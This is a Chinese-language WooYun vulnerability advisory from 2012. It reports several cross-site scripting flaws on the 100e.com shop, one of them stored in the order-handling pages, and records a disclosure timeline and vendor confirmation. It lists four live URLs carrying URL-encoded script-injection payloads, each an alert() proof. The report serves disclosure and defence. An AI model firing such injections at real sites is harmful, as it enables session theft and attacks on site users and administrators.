漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-015494
漏洞标题:100e 多处包括订单处理处的XSS
相关厂商:100e.com
漏洞作者: lxj616
提交时间:2012-12-02 11:28
修复时间:2013-01-16 11:29
公开时间:2013-01-16 11:29
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-12-02: 细节已通知厂商并且等待厂商处理中
2012-12-03: 厂商已经确认,细节仅向厂商公开
2012-12-13: 细节向核心白帽子及相关领域专家公开
2012-12-23: 细节向普通白帽子公开
2013-01-02: 细节向实习白帽子公开
2013-01-16: 细节向公众公开
简要描述:
100e 有几处XSS(到后台订单处理了。。。) 影响所有用户 尤其是订单管理员
详细说明:
有一个是在订单中生成,形成储存式XSS,问一问订单处理人员,应该看到过一个奇怪的弹窗:)
http://www.ls100e.com/ns.asp?nowmenuid=500290&pageno=1&previd=500292&key=%22%3E%3Cscript%3Ealert%2891%29%3C%2Fscript%3E
http://www.ls100e.com/shop.asp?key=1234%22%3E%3Cscript+%3Ealert%28796%29%3C%2Fscript%3E&previd=500017&nowmenuid=500010&Submit2=%CB%D1%CB%F7
http://www.ls100e.com/shop_cart.asp?cc=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&prodid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&nowmenuid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E
http://www.ls100e.com/shop_order.asp?orderid=500828%27%2Balert%28827%29%2B%27&nowmenuid=500010&tm=500010205251500828
漏洞证明:
修复方案:
把4个文件过滤一下
版权声明:转载请注明来源 lxj616@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-12-03 15:37
厂商回复:
谢谢提醒。
最新状态:
暂无